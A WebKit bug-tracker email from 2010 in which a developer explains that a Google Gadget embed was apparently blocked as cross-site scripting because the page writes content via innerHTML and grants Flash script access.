[Webkit-unassigned] [Bug 35802] Gadget embed blocked due to URL in content
bugzilla-daemon at webkit.org
bugzilla-daemon at webkit.org
Sat Mar 6 20:10:55 PST 2010
https://bugs.webkit.org/show_bug.cgi?id=35802
--- Comment #3 from Daniel Bates <dbates at webkit.org> 2010-03-06 20:10:55 PST ---
>From briefly looking at the HTML source, this is an XSS attack since the page
<http://jujo00obo2o234ungd3t8qjfcjrs3o6k-a-sites-opensocial.googleusercontent.com/gadgets/ifr>
calls document.innerHTML with the contents of the anchor #up_embed_snippet.
Moreover, among the <object>/<embed> parameters passed is
allowscriptaccess="always", which would allow the flash content to execute
arbitrary JavaScript scripts. In this case, such scripts would execute with
respect to the domain for the iframe,
http://jujo00obo2o234ungd3t8qjfcjrs3o6k-a-sites-opensocial.googleusercontent.com.
I am not too familiar with Google Gadgets or its workings. Adam may have more
insight into this.
--
Configure bugmail: https://bugs.webkit.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.
More information about the webkit-unassigned
mailing list